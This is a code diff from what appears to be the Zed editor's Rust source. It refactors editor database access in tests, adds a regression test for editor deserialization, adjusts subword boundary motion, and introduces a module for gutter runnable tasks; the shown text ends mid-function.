@@ -2267,8 +2273,10 @@ mod tests {
MultiWorkspace::test_new(project.clone(), window, cx)
});
let workspace = multi_workspace.read_with(cx, |mw, _| mw.workspace().clone());
+ let db = cx.update(|_, cx| workspace::WorkspaceDb::global(cx));
+ let editor_db = cx.update(|_, cx| EditorDb::global(cx));
- let workspace_id = workspace::WORKSPACE_DB.next_id().await.unwrap();
+ let workspace_id = db.next_id().await.unwrap();
let item_id = 10000 as ItemId;
let serialized_editor = SerializedEditor {
@@ -2278,7 +2286,8 @@ mod tests {
mtime: None,
};
- DB.save_serialized_editor(item_id, workspace_id, serialized_editor)
+ editor_db
+ .save_serialized_editor(item_id, workspace_id, serialized_editor)
.await
.unwrap();
@@ -2309,8 +2318,10 @@ mod tests {
MultiWorkspace::test_new(project.clone(), window, cx)
});
let workspace = multi_workspace.read_with(cx, |mw, _| mw.workspace().clone());
+ let db = cx.update(|_, cx| workspace::WorkspaceDb::global(cx));
+ let editor_db = cx.update(|_, cx| EditorDb::global(cx));
- let workspace_id = workspace::WORKSPACE_DB.next_id().await.unwrap();
+ let workspace_id = db.next_id().await.unwrap();
let item_id = 11000 as ItemId;
let mtime = fs
@@ -2328,7 +2339,8 @@ mod tests {
mtime: Some(mtime),
};
- DB.save_serialized_editor(item_id, workspace_id, serialized_editor)
+ editor_db
+ .save_serialized_editor(item_id, workspace_id, serialized_editor)
.await
.unwrap();
@@ -2346,4 +2358,75 @@ mod tests {
});
}
}
+
+ // Regression test for https://github.com/zed-industries/zed/issues/35947
+ // Verifies that deserializing a non-worktree editor does not add the item
+ // to any pane as a side effect.
+ #[gpui::test]
+ async fn test_deserialize_non_worktree_file_does_not_add_to_pane(
+ cx: &mut gpui::TestAppContext,
+ ) {
+ init_test(cx, |_| {});
+
+ let fs = FakeFs::new(cx.executor());
+ fs.insert_tree(path!("/outside"), json!({ "settings.json": "{}" }))
+ .await;
+
+ // Project with a different root — settings.json is NOT in any worktree
+ let project = Project::test(fs.clone(), [], cx).await;
+ let (multi_workspace, cx) =
+ cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx));
+ let workspace = multi_workspace.read_with(cx, |mw, _| mw.workspace().clone());
+ let db = cx.update(|_, cx| workspace::WorkspaceDb::global(cx));
+ let editor_db = cx.update(|_, cx| EditorDb::global(cx));
+
+ let workspace_id = db.next_id().await.unwrap();
+ let item_id = 99999 as ItemId;
+
+ let serialized_editor = SerializedEditor {
+ abs_path: Some(PathBuf::from(path!("/outside/settings.json"))),
+ contents: None,
+ language: None,
+ mtime: None,
+ };
+
+ editor_db
+ .save_serialized_editor(item_id, workspace_id, serialized_editor)
+ .await
+ .unwrap();
+
+ // Count items in all panes before deserialization
+ let pane_items_before = workspace.read_with(cx, |workspace, cx| {
+ workspace
+ .panes()
+ .iter()
+ .map(|pane| pane.read(cx).items_len())
+ .sum::<usize>()
+ });
+
+ let deserialized =
+ deserialize_editor(item_id, workspace_id, workspace.clone(), project, cx).await;
+
+ cx.run_until_parked();
+
+ // The editor should exist and have the file
+ deserialized.update(cx, |editor, cx| {
+ let buffer = editor.buffer().read(cx).as_singleton().unwrap().read(cx);
+ assert!(buffer.file().is_some());
+ });
+
+ // No items should have been added to any pane as a side effect
+ let pane_items_after = workspace.read_with(cx, |workspace, cx| {
+ workspace
+ .panes()
+ .iter()
+ .map(|pane| pane.read(cx).items_len())
+ .sum::<usize>()
+ });
+
+ assert_eq!(
+ pane_items_before, pane_items_after,
+ "Editor::deserialize should not add items to panes as a side effect"
+ );
+ }
}
@@ -50,7 +50,7 @@ pub(super) fn refresh_linked_ranges(
window: &mut Window,
cx: &mut Context<Editor>,
) -> Option<()> {
- if !editor.mode().is_full() || editor.pending_rename.is_some() {
+ if !editor.lsp_data_enabled() || editor.pending_rename.is_some() {
return None;
}
let project = editor.project()?.downgrade();
@@ -286,13 +286,7 @@ pub fn deploy_context_menu(
.separator()
.action_disabled_when(
!has_reveal_target,
- if cfg!(target_os = "macos") {
- "Reveal in Finder"
- } else if cfg!(target_os = "windows") {
- "Reveal in File Explorer"
- } else {
- "Reveal in File Manager"
- },
+ ui::utils::reveal_in_file_manager_label(false),
Box::new(RevealInFileManager),
)
.when(is_markdown, |builder| {
@@ -408,7 +408,7 @@ pub fn previous_subword_start(map: &DisplaySnapshot, point: DisplayPoint) -> Dis
let classifier = map.buffer_snapshot().char_classifier_at(raw_point);
find_preceding_boundary_display_point(map, point, FindRange::MultiLine, &mut |left, right| {
- is_subword_start(left, right, &classifier) || left == '\n'
+ is_subword_start(left, right, &classifier) || left == '\n' || right == '\n'
})
}
@@ -431,6 +431,7 @@ pub fn is_subword_start(left: char, right: char, classifier: &CharClassifier) ->
let is_word_start = classifier.kind(left) != classifier.kind(right) && !right.is_whitespace();
let is_subword_start = classifier.is_word('-') && left == '-' && right != '-'
|| left == '_' && right != '_'
+ || left != '_' && right == '_'
|| left.is_lowercase() && right.is_uppercase();
is_word_start || is_subword_start
}
@@ -484,7 +485,7 @@ pub fn next_subword_end(map: &DisplaySnapshot, point: DisplayPoint) -> DisplayPo
let classifier = map.buffer_snapshot().char_classifier_at(raw_point);
find_boundary(map, point, FindRange::MultiLine, &mut |left, right| {
- is_subword_end(left, right, &classifier) || right == '\n'
+ is_subword_end(left, right, &classifier) || left == '\n' || right == '\n'
})
}
@@ -519,6 +520,7 @@ pub fn is_subword_end(left: char, right: char, classifier: &CharClassifier) -> b
fn is_subword_boundary_end(left: char, right: char, classifier: &CharClassifier) -> bool {
classifier.is_word('-') && left != '-' && right == '-'
|| left != '_' && right == '_'
+ || left == '_' && right != '_'
|| left.is_lowercase() && right.is_uppercase()
}
@@ -973,10 +975,10 @@ mod tests {
}
// Subword boundaries are respected
- assert("lorem_ˇipˇsum", cx);
+ assert("loremˇ_ˇipsum", cx);
assert("lorem_ˇipsumˇ", cx);
- assert("ˇlorem_ˇipsum", cx);
- assert("lorem_ˇipsum_ˇdolor", cx);
+ assert("ˇloremˇ_ipsum", cx);
+ assert("lorem_ˇipsumˇ_dolor", cx);
assert("loremˇIpˇsum", cx);
assert("loremˇIpsumˇ", cx);
@@ -1156,10 +1158,10 @@ mod tests {
}
// Subword boundaries are respected
- assert("loˇremˇ_ipsum", cx);
+ assert("loremˇ_ˇipsum", cx);
assert("ˇloremˇ_ipsum", cx);
- assert("loremˇ_ipsumˇ", cx);
- assert("loremˇ_ipsumˇ_dolor", cx);
+ assert("loremˇ_ˇipsum", cx);
+ assert("lorem_ˇipsumˇ_dolor", cx);
assert("loˇremˇIpsum", cx);
assert("loremˇIpsumˇDolor", cx);
@@ -1172,7 +1174,7 @@ mod tests {
assert("loremˇ ipsumˇ ", cx);
assert("loremˇ-ˇipsum", cx);
assert("loremˇ#$@-ˇipsum", cx);
- assert("loremˇ_ipsumˇ", cx);
+ assert("loremˇ_ˇipsum", cx);
assert(" ˇbcˇΔ", cx);
assert(" abˇ——ˇcd", cx);
}
@@ -226,7 +226,7 @@ impl Domain for EditorDb {
];
}
-db::static_connection!(DB, EditorDb, [WorkspaceDb]);
+db::static_connection!(EditorDb, [WorkspaceDb]);
// https://www.sqlite.org/limits.html
// > <..> the maximum value of a host parameter number is SQLITE_MAX_VARIABLE_NUMBER,
@@ -415,8 +415,10 @@ mod tests {
use super::*;
#[gpui::test]
- async fn test_save_and_get_serialized_editor() {
- let workspace_id = workspace::WORKSPACE_DB.next_id().await.unwrap();
+ async fn test_save_and_get_serialized_editor(cx: &mut gpui::TestAppContext) {
+ let db = cx.update(|cx| workspace::WorkspaceDb::global(cx));
+ let workspace_id = db.next_id().await.unwrap();
+ let editor_db = cx.update(|cx| EditorDb::global(cx));
let serialized_editor = SerializedEditor {
abs_path: Some(PathBuf::from("testing.txt")),
@@ -425,11 +427,12 @@ mod tests {
mtime: None,
};
- DB.save_serialized_editor(1234, workspace_id, serialized_editor.clone())
+ editor_db
+ .save_serialized_editor(1234, workspace_id, serialized_editor.clone())
.await
.unwrap();
- let have = DB
+ let have = editor_db
.get_serialized_editor(1234, workspace_id)
.unwrap()
.unwrap();
@@ -443,11 +446,12 @@ mod tests {
mtime: None,
};
- DB.save_serialized_editor(1234, workspace_id, serialized_editor.clone())
+ editor_db
+ .save_serialized_editor(1234, workspace_id, serialized_editor.clone())
.await
.unwrap();
- let have = DB
+ let have = editor_db
.get_serialized_editor(1234, workspace_id)
.unwrap()
.unwrap();
@@ -461,11 +465,12 @@ mod tests {
mtime: None,
};
- DB.save_serialized_editor(1234, workspace_id, serialized_editor.clone())
+ editor_db
+ .save_serialized_editor(1234, workspace_id, serialized_editor.clone())
.await
.unwrap();
- let have = DB
+ let have = editor_db
.get_serialized_editor(1234, workspace_id)
.unwrap()
.unwrap();
@@ -479,11 +484,12 @@ mod tests {
mtime: Some(MTime::from_seconds_and_nanos(100, 42)),
};
- DB.save_serialized_editor(1234, workspace_id, serialized_editor.clone())
+ editor_db
+ .save_serialized_editor(1234, workspace_id, serialized_editor.clone())
.await
.unwrap();
- let have = DB
+ let have = editor_db
.get_serialized_editor(1234, workspace_id)
.unwrap()
.unwrap();
@@ -499,8 +505,10 @@ mod tests {
// The search uses contains_str_at() to find fingerprints in the buffer.
#[gpui::test]
- async fn test_save_and_get_file_folds() {
- let workspace_id = workspace::WORKSPACE_DB.next_id().await.unwrap();
+ async fn test_save_and_get_file_folds(cx: &mut gpui::TestAppContext) {
+ let db = cx.update(|cx| workspace::WorkspaceDb::global(cx));
+ let workspace_id = db.next_id().await.unwrap();
+ let editor_db = cx.update(|cx| EditorDb::global(cx));
// file_folds table uses path as key (no FK to editors table)
let file_path: Arc<Path> = Arc::from(Path::new("/tmp/test_file_folds.rs"));
@@ -520,12 +528,13 @@ mod tests {
"} // end Foo".to_string(),
),
];
- DB.save_file_folds(workspace_id, file_path.clone(), folds.clone())
+ editor_db
+ .save_file_folds(workspace_id, file_path.clone(), folds.clone())
.await
.unwrap();
// Retrieve and verify fingerprints are preserved
- let retrieved = DB.get_file_folds(workspace_id, &file_path).unwrap();
+ let retrieved = editor_db.get_file_folds(workspace_id, &file_path).unwrap();
assert_eq!(retrieved.len(), 2);
assert_eq!(
retrieved[0],
@@ -553,11 +562,12 @@ mod tests {
"impl Bar {".to_string(),
"} // end impl".to_string(),
)];
- DB.save_file_folds(workspace_id, file_path.clone(), new_folds)
+ editor_db
+ .save_file_folds(workspace_id, file_path.clone(), new_folds)
.await
.unwrap();
- let retrieved = DB.get_file_folds(workspace_id, &file_path).unwrap();
+ let retrieved = editor_db.get_file_folds(workspace_id, &file_path).unwrap();
assert_eq!(retrieved.len(), 1);
assert_eq!(
retrieved[0],
@@ -570,10 +580,11 @@ mod tests {
);
// Test delete
- DB.delete_file_folds(workspace_id, file_path.clone())
+ editor_db
+ .delete_file_folds(workspace_id, file_path.clone())
.await
.unwrap();
- let retrieved = DB.get_file_folds(workspace_id, &file_path).unwrap();
+ let retrieved = editor_db.get_file_folds(workspace_id, &file_path).unwrap();
assert!(retrieved.is_empty());
// Test multiple files don't interfere
@@ -582,15 +593,21 @@ mod tests {
let folds_a = vec![(10, 20, "a_start".to_string(), "a_end".to_string())];
let folds_b = vec![(30, 40, "b_start".to_string(), "b_end".to_string())];
- DB.save_file_folds(workspace_id, file_path_a.clone(), folds_a)
+ editor_db
+ .save_file_folds(workspace_id, file_path_a.clone(), folds_a)
.await
.unwrap();
- DB.save_file_folds(workspace_id, file_path_b.clone(), folds_b)
+ editor_db
+ .save_file_folds(workspace_id, file_path_b.clone(), folds_b)
.await
.unwrap();
- let retrieved_a = DB.get_file_folds(workspace_id, &file_path_a).unwrap();
- let retrieved_b = DB.get_file_folds(workspace_id, &file_path_b).unwrap();
+ let retrieved_a = editor_db
+ .get_file_folds(workspace_id, &file_path_a)
+ .unwrap();
+ let retrieved_b = editor_db
+ .get_file_folds(workspace_id, &file_path_b)
+ .unwrap();
assert_eq!(retrieved_a.len(), 1);
assert_eq!(retrieved_b.len(), 1);
@@ -0,0 +1,1093 @@
+use std::{collections::BTreeMap, mem, ops::Range, sync::Arc};
+
+use clock::Global;
+use collections::{HashMap, HashSet};
+use gpui::{
+ App, AppContext as _, AsyncWindowContext, ClickEvent, Context, Entity, Focusable as _,
+ MouseButton, Task, Window,
+};
+use language::{Buffer, BufferRow, Runnable};
+use lsp::LanguageServerName;
+use multi_buffer::{
+ Anchor, BufferOffset, MultiBufferOffset, MultiBufferRow, MultiBufferSnapshot, ToPoint as _,
+};
+use project::{
+ Location, Project, TaskSourceKind,
+ debugger::breakpoint_store::{Breakpoint, BreakpointSessionState},
+ project_settings::ProjectSettings,
+};
+use settings::Settings as _;
+use smallvec::SmallVec;
+use task::{ResolvedTask, RunnableTag, TaskContext, TaskTemplate, TaskVariables, VariableName};
+use text::{BufferId, OffsetRangeExt as _, ToOffset as _, ToPoint as _};
+use ui::{Clickable as _, Color, IconButton, IconSize, Toggleable as _};
+
+use crate::{
+ CodeActionSource, Editor, EditorSettings, EditorStyle, RangeToAnchorExt, SpawnNearestTask,
+ ToggleCodeActions, UPDATE_DEBOUNCE, display_map::DisplayRow,
+};
+
+#[derive(Debug)]
+pub(super) struct RunnableData {
+ runnables: HashMap<BufferId, (Global, BTreeMap<BufferRow, RunnableTasks>)>,
+ invalidate_buffer_data: HashSet<BufferId>,
+ runnables_update_task: Task<()>,
+}
+
+impl RunnableData {
+ pub fn new() -> Self {
+ Self {
+ runnables: HashMap::default(),
+ invalidate_buffer_data: HashSet::default(),
+ runnables_update_task: Task::ready(()),
+ }
+ }
+
+ pub fn runnables(
+ &self,
+ (buffer_id, buffer_row): (BufferId, BufferRow),
+ ) -> Option<&RunnableTasks> {
+ self.runnables.get(&buffer_id)?.1.get(&buffer_row)
+ }
+
+ pub fn all_runnables(&self) -> impl Iterator<Item = &RunnableTasks> {
+ self.runnables
+ .values()
+ .flat_map(|(_, tasks)| tasks.values())
+ }
+
+ pub fn has_cached(&self, buffer_id: BufferId, version: &Global) -> bool {
+ self.runnables
+ .get(&buffer_id)
+ .is_some_and(|(cached_version, _)| !version.changed_since(cached_version))
+ }
+
+ #[cfg(test)]
+ pub fn insert(
+ &mut self,
+ buffer_id: BufferId,
+ buffer_row: BufferRow,
+ version: Global,
+ tasks: RunnableTasks,
+ ) {
+ self.runnables
+ .entry(buffer_id)
+ .or_insert_with(|| (version, BTreeMap::default()))
+ .1
+ .insert(buffer_row, tasks);
+ }
+}
+
+#[derive(Clone, Debug)]
+pub struct RunnableTasks {
+ pub templates: Vec<(TaskSourceKind, TaskTemplate)>,
+ pub offset: multi_buffer::Anchor,
+ // We need the column at which the task context evaluation should take place (when we're spawning it via gutter).
+ pub column: u32,
+ // Values of all named captures, including those starting with '_'
+ pub extra_variables: HashMap<String, String>,
+ // Full range of the tagged region. We use it to determine which `extra_variables` to grab for context resolution in e.g. a modal.
+ pub context_range: Range<BufferOffset>,
+}
+
+impl RunnableTasks {
+ pub fn resolve<'a>(
+ &'a self,
+ cx: &'a task::TaskContext,
+ ) -> impl Iterator<Item = (TaskSourceKind, ResolvedTask)> + 'a {
+ self.templates.iter().filter_map(|(kind, template)| {
+ template
+ .resolve_task(&kind.to_id_base(), cx)
+ .map(|task| (kind.clone(), task))
+ })
+ }
+}
+
+#[derive(Clone)]
+pub struct ResolvedTasks {
+ pub templates: SmallVec<[(TaskSourceKind, ResolvedTask); 1]>,
+ pub position: Anchor,
+}
+
+impl Editor {
+ pub fn refresh_runnables(
+ &mut self,
+ invalidate_buffer_data: Option<BufferId>,
+ window: &mut Window,
+ cx: &mut Context<Self>,
+ ) {
+ if !self.mode().is_full()
+ || !EditorSettings::get_global(cx).gutter.runnables
+ || !self.enable_runnables
+ {
+ self.clear_runnables(None);
+ return;
+ }
+ if let Some(buffer) = self.buffer().read(cx).as_singleton() {
+ let buffer_id = buffer.read(cx).remote_id();
+ if invalidate_buffer_data != Some(buffer_id)
+ && self
+ .runnables
+ .has_cached(buffer_id, &buffer.read(cx).version())
+ {
+ return;
+ }
+ }
+ if let Some(buffer_id) = invalidate_buffer_data {
+ self.runnables.invalidate_buffer_data.insert(buffer_id);
+ }
+
+ let project = self.project().map(Entity::downgrade);
+ let lsp_task_sources = self.lsp_task_sources(true, true, cx);
+ let multi_buffer = self.buffer.downgrade();
+ self.runnables.runnables_update_task = cx.spawn_in(window, async move |editor, cx| {
+ cx.background_executor().timer(UPDATE_DEBOUNCE).await;
+ let Some(project) = project.and_then(|p| p.upgrade()) else {
+ return;
+ };
+
+ let hide_runnables = project.update(cx, |project, _| project.is_via_collab());
+ if hide_runnables {
+ return;
+ }
+ let lsp_tasks = if lsp_task_sources.is_empty() {
+ Vec::new()
+ } else {
+ let Ok(lsp_tasks) = cx
+ .update(|_, cx| crate::lsp_tasks(project.clone(), &lsp_task_sources, None, cx))
+ else {
+ return;
+ };
+ lsp_tasks.await
+ };
+ let new_rows = {
+ let Some((multi_buffer_snapshot, multi_buffer_query_range)) = editor
+ .update(cx, |editor, cx| {
+ let multi_buffer = editor.buffer().read(cx);
+ if multi_buffer.is_singleton() {
+ Some((multi_buffer.snapshot(cx), Anchor::min()..Anchor::max()))
+ } else {
+ let display_snapshot =
+ editor.display_map.update(cx, |map, cx| map.snapshot(cx));
+ let multi_buffer_query_range =
+ editor.multi_buffer_visible_range(&display_snapshot, cx);
+ let multi_buffer_snapshot = display_snapshot.buffer();
+ Some((
+ multi_buffer_snapshot.clone(),
+ multi_buffer_query_range.to_anchors(&multi_buffer_snapshot),
+ ))
+ }
+ })
+ .ok()
+ .flatten()
+ else {
+ return;
+ };
+ cx.background_spawn({
+ async move {
+ multi_buffer_snapshot
+ .runnable_ranges(multi_buffer_query_range)
+ .collect()
+ }
+ })
+ .await
+ };
+
+ let Ok(multi_buffer_snapshot) =
+ editor.update(cx, |editor, cx| editor.buffer().read(cx).snapshot(cx))
+ else {
+ return;
+ };
+ let Ok(mut lsp_tasks_by_rows) = cx.update(|_, cx| {
+ lsp_tasks
+ .into_iter()
+ .flat_map(|(kind, tasks)| {
+ tasks.into_iter().filter_map(move |(location, task)| {
+ Some((kind.clone(), location?, task))
+ })
+ })
+ .fold(HashMap::default(), |mut acc, (kind, location, task)| {
+ let buffer = location.target.buffer;
+ let buffer_snapshot = buffer.read(cx).snapshot();
+ let offset = multi_buffer_snapshot.excerpts().find_map(
+ |(excerpt_id, snapshot, _)| {
+ if snapshot.remote_id() == buffer_snapshot.remote_id() {
+ multi_buffer_snapshot
+ .anchor_in_excerpt(excerpt_id, location.target.range.start)
+ } else {
+ None
+ }
+ },
+ );
+ if let Some(offset) = offset {
+ let task_buffer_range =
+ location.target.range.to_point(&buffer_snapshot);
+ let context_buffer_range =
+ task_buffer_range.to_offset(&buffer_snapshot);
+ let context_range = BufferOffset(context_buffer_range.start)
+ ..BufferOffset(context_buffer_range.end);
+
+ acc.entry((buffer_snapshot.remote_id(), task_buffer_range.start.row))
+ .or_insert_with(|| RunnableTasks {
+ templates: Vec::new(),
+ offset,
+ column: task_buffer_range.start.column,
+ extra_variables: HashMap::default(),
+ context_range,
+ })
+ .templates
+ .push((kind, task.original_task().clone()));
+ }
+
+ acc
+ })
+ }) else {
+ return;
+ };
+
+ let Ok(prefer_lsp) = multi_buffer.update(cx, |buffer, cx| {
+ buffer.language_settings(cx).tasks.prefer_lsp
+ }) else {
+ return;
+ };
+
+ let rows = Self::runnable_rows(
+ project,
+ multi_buffer_snapshot,
+ prefer_lsp && !lsp_tasks_by_rows.is_empty(),
+ new_rows,
+ cx.clone(),
+ )
+ .await;
+ editor
+ .update(cx, |editor, cx| {
+ for buffer_id in std::mem::take(&mut editor.runnables.invalidate_buffer_data) {
+ editor.clear_runnables(Some(buffer_id));
+ }
+
+ for ((buffer_id, row), mut new_tasks) in rows {
+ let Some(buffer) = editor.buffer().read(cx).buffer(buffer_id) else {
+ continue;
+ };
+
+ if let Some(lsp_tasks) = lsp_tasks_by_rows.remove(&(buffer_id, row)) {
+ new_tasks.templates.extend(lsp_tasks.templates);
+ }
+ editor.insert_runnables(
+ buffer_id,
+ buffer.read(cx).version(),
+ row,
+ new_tasks,
+ );
+ }
+ for ((buffer_id, row), new_tasks) in lsp_tasks_by_rows {
+ let Some(buffer) = editor.buffer().read(cx).buffer(buffer_id) else {
+ continue;
+ };
+ editor.insert_runnables(
+ buffer_id,
+ buffer.read(cx).version(),
+ row,
+ new_tasks,
+ );
+ }
+ })
+ .ok();
+ });
+ }
+
+ pub fn spawn_nearest_task(
+ &mut self,
+ action: &SpawnNearestTask,
+ window: &mut Window,
+ cx: &mut Context<Self>,
+ ) {
+ let Some((workspace, _)) = self.workspace.clone() else {
+ return;
+ };
+ let Some(project) = self.project.clone() else {
+ return;
+ };
+
+ // Try to find a closest, enclosing node using tree-sitter that has a task
+ let Some((buffer, buffer_row, tasks)) = self
+ .find_enclosing_node_task(cx)
+ // Or find the task that's closest in row-distance.
+ .or_else(|| self.find_closest_task(cx))
+ else {
+ return;
+ };
+
+ let reveal_strategy = action.reveal;
+ let task_context = Self::build_tasks_context(&project, &buffer, buffer_row, &tasks, cx);
+ cx.spawn_in(window, async move |_, cx| {
+ let context = task_context.await?;
+ let (task_source_kind, mut resolved_task) = tasks.resolve(&context).next()?;
+
+ let resolved = &mut resolved_task.resolved;
+ resolved.reveal = reveal_strategy;
+
+ workspace
+ .update_in(cx, |workspace, window, cx| {
+ workspace.schedule_resolved_task(
+ task_source_kind,
+ resolved_task,
+ false,
+ window,
+ cx,
+ );
+ })
+ .ok()
+ })
+ .detach();
+ }
+
+ pub fn clear_runnables(&mut self, for_buffer: Option<BufferId>) {
+ if let Some(buffer_id) = for_buffer {
+ self.runnables.runnables.remove(&buffer_id);
+ } else {
+ self.runnables.runnables.clear();
+ }
+ self.runnables.invalidate_buffer_data.clear();
+ self.runnables.runnables_update_task = Task::ready(());
+ }
+
+ pub fn task_context(&self, window: &mut Window, cx: &mut App) -> Task<Option<TaskContext>> {
+ let Some(project) = self.project.clone() else {
+ return Task::ready(None);
+ };
+ let (selection, buffer, editor_snapshot) = {
+ let selection = self.selections.newest_adjusted(&self.display_snapshot(cx));
+ let Some((buffer, _)) = self
+ .buffer()
+ .read(cx)
+ .point_to_buffer_offset(selection.start, cx)
+ else {
+ return Task::ready(None);
+ };
+ let snapshot = self.snapshot(window, cx);
+ (selection, buffer, snapshot)
+ };
+ let selection_range = selection.range();
+ let start = editor_snapshot
+ .display_snapshot
+ .buffer_snapshot()
+ .anchor_after(selection_range.start)
+ .text_anchor;
+ let end = editor_snapshot
+ .display_snapshot
+ .buffer_snapshot()
+ .anchor_after(selection_range.end)
+ .text_anchor;
+ let location = Location {
+ buffer,
+ range: start..end,
+ };
+ let captured_variables = {
+ let mut variables = TaskVariables::default();
+ let buffer = location.buffer.read(cx);
+ let buffer_id = buffer.remote_id();
+ let snapshot = buffer.snapshot();
+ let starting_point = location.range.start.to_point(&snapshot);
+ let starting_offset = starting_point.to_offset(&snapshot);
+ for (_, tasks) in self
+ .runnables
+ .runnables
+ .get(&buffer_id)
+ .into_iter()
+ .flat_map(|(_, tasks)| tasks.range(0..starting_point.row + 1))
+ {
+ if !tasks
+ .context_range
+ .contains(&crate::BufferOffset(starting_offset))
+ {
+ continue;
+ }
+ for (capture_name, value) in tasks.extra_variables.iter() {
+ variables.insert(
+ VariableName::Custom(capture_name.to_owned().into()),
+ value.clone(),
+ );
+ }
+ }
+ variables
+ };
+
+ project.update(cx, |project, cx| {
+ project.task_store().update(cx, |task_store, cx| {
+ task_store.task_context_for_location(captured_variables, location, cx)
+ })
+ })
+ }
+
+ pub fn lsp_task_sources(
+ &self,
+ visible_only: bool,
+ skip_cached: bool,
+ cx: &mut Context<Self>,
+ ) -> HashMap<LanguageServerName, Vec<BufferId>> {
+ if !self.lsp_data_enabled() {
+ return HashMap::default();
+ }
+ let buffers = if visible_only {
+ self.visible_excerpts(true, cx)
+ .into_values()
+ .map(|(buffer, _, _)| buffer)
+ .collect()
+ } else {
+ self.buffer().read(cx).all_buffers()
+ };
+
+ let lsp_settings = &ProjectSettings::get_global(cx).lsp;
+
+ buffers
+ .into_iter()
+ .filter_map(|buffer| {
+ let lsp_tasks_source = buffer
+ .read(cx)
+ .language()?
+ .context_provider()?
+ .lsp_task_source()?;
+ if lsp_settings
+ .get(&lsp_tasks_source)
+ .is_none_or(|s| s.enable_lsp_tasks)
+ {
+ let buffer_id = buffer.read(cx).remote_id();
+ if skip_cached
+ && self
+ .runnables
+ .has_cached(buffer_id, &buffer.read(cx).version())
+ {
+ None
+ } else {
+ Some((lsp_tasks_source, buffer_id))
+ }
+ } else {
+ None
+ }
+ })
+ .fold(
+ HashMap::default(),
+ |mut acc, (lsp_task_source, buffer_id)| {
+ acc.entry(lsp_task_source)
+ .or_insert_with(Vec::new)
+ .push(buffer_id);
+ acc
+ },
+ )
+ }
+
+ pub fn find_enclosing_node_task(
+ &mut self,
+ cx: &mut Context<Self>,
+ ) -> Option<(Entity<Buffer>, u32, Arc<RunnableTasks>)> {
+ let snapshot = self.buffer.read(cx).snapshot(cx);
+ let offset = self
+ .selections
+ .newest::<MultiBufferOffset>(&self.display_snapshot(cx))
+ .head();
+ let mut excerpt = snapshot.excerpt_containing(offset..offset)?;
+ let offset = excerpt.map_offset_to_buffer(offset);
+ let buffer_id = excerpt.buffer().remote_id();
+
+ let layer = excerpt.buffer().syntax_layer_at(offset)?;
+ let mut cursor = layer.node().walk();
+
+ while cursor.goto_first_child_for_byte(offset.0).is_some() {
+ if cursor.node().end_byte() == offset.0 {
+ cursor.goto_next_sibling();
+ }
+ }
+
+ // Ascend to the smallest ancestor that contains the range and has a task.
+ loop {
+ let node = cursor.node();
+ let node_range = node.byte_range();
+ let symbol_start_row = excerpt.buffer().offset_to_point(node.start_byte()).row;
+
+ // Check if this node contains our offset
+ if node_range.start <= offset.0 && node_range.end >= offset.0 {
+ // If it contains offset, check for task
+ if let Some(tasks) = self
+ .runnables
+ .runnables
+ .get(&buffer_id)
+ .and_then(|(_, tasks)| tasks.get(&symbol_start_row))
+ {
+ let buffer = self.buffer.read(cx).buffer(buffer_id)?;
+ return Some((buffer, symbol_start_row, Arc::new(tasks.to_owned())));
+ }
+ }
+
+ if !cursor.goto_parent() {
+ break;
+ }
+ }
+ None
+ }
+
+ pub fn render_run_indicator(
+ &self,
+ _style: &EditorStyle,
+ is_active: bool,
+ row: DisplayRow,
+ breakpoint: Option<(Anchor, Breakpoint, Option<BreakpointSessionState>)>,
+ cx: &mut Context<Self>,
+ ) -> IconButton {
+ let color = Color::Muted;
+ let position = breakpoint.as_ref().map(|(anchor, _, _)| *anchor);
+
+ IconButton::new(
+ ("run_indicator", row.0 as usize),
+ ui::IconName::PlayOutlined,
+ )
+ .shape(ui::IconButtonShape::Square)
+ .icon_size(IconSize::XSmall)
+ .icon_color(color)
+ .toggle_state(is_active)
+ .on_click(cx.listener(move |editor, e: &ClickEvent, window, cx| {
+ let quick_launch = match e {
+ ClickEvent::Keyboard(_) => true,
+ ClickEvent::Mouse(e) => e.down.button == MouseButton::Left,
+ };
+
+ window.focus(&editor.focus_handle(cx), cx);
+ editor.toggle_code_actions(
+ &ToggleCodeActions {
+ deployed_from: Some(CodeActionSource::RunMenu(row)),
+ quick_launch,
+ },
+ window,
+ cx,
+ );
+ }))
+ .on_right_click(cx.listener(move |editor, event: &ClickEvent, window, cx| {
+ editor.set_breakpoint_context_menu(row, position, event.position(), window, cx);
+ }))
+ }
+
+ fn insert_runnables(
+ &mut self,
+ buffer: BufferId,
+ version: Global,
+ row: BufferRow,
+ new_tasks: RunnableTasks,
+ ) {
+ let (old_version, tasks) = self.runnables.runnables.entry(buffer).or_default();
+ if !old_version.changed_since(&version) {
+ *old_version = version;
+ tasks.insert(row, new_tasks);
+ }
+ }
+
+ fn runnable_rows(
+ project: Entity<Project>,
+ snapshot: MultiBufferSnapshot,
+ prefer_lsp: bool,
+ runnable_ranges: Vec<(Range<Anchor>, language::RunnableRange)>,
+ cx: AsyncWindowContext,
+ ) -> Task<Vec<((BufferId, BufferRow), RunnableTasks)>> {
+ cx.spawn(async move |cx| {
+ let mut runnable_rows = Vec::with_capacity(runnable_ranges.len());
+ for (run_range, mut runnable) in runnable_ranges {
+ let Some(tasks) = cx
+ .update(|_, cx| Self::templates_with_tags(&project, &mut runnable.runnable, cx))
+ .ok()
+ else {
+ continue;
+ };
+ let mut tasks = tasks.await;
+
+ if prefer_lsp {
+ tasks.retain(|(task_kind, _)| {
+ !matches!(task_kind, TaskSourceKind::Language { .. })
+ });
+ }
+ if tasks.is_empty() {
+ continue;
+ }
+
+ let point = run_range.start.to_point(&snapshot);
+ let Some(row) = snapshot
+ .buffer_line_for_row(MultiBufferRow(point.row))
+ .map(|(_, range)| range.start.row)
+ else {
+ continue;
+ };
+
+ let context_range =
+ BufferOffset(runnable.full_range.start)..BufferOffset(runnable.full_range.end);
+ runnable_rows.push((
+ (runnable.buffer_id, row),
+ RunnableTasks {
+ templates: tasks,
+ offset: run_range.start,
+ context_range,
+ column: point.column,
+ extra_variables: runnable.extra_captures,
+ },
+ ));
+ }
+ runnable_rows
+ })
+ }
+
+ fn templates_with_tags(
+ project: &Entity<Project>,
+ runnable: &mut Runnable,
+ cx: &mut App,
+ ) -> Task<Vec<(TaskSourceKind, TaskTemplate)>> {
+ let (inventory, worktree_id, file) = project.read_with(cx, |project, cx| {
+ let (worktree_id, file) = project
+ .buffer_for_id(runnable.buffer, cx)
+ .and_then(|buffer| buffer.read(cx).file())
+ .map(|file| (file.worktree_id(cx), file.clone()))
+ .unzip();
+
+ (
+ project.task_store().read(cx).task_inventory().cloned(),
+ worktree_id,
+ file,
+ )
+ });
+
+ let tags = mem::take(&mut runnable.tags);
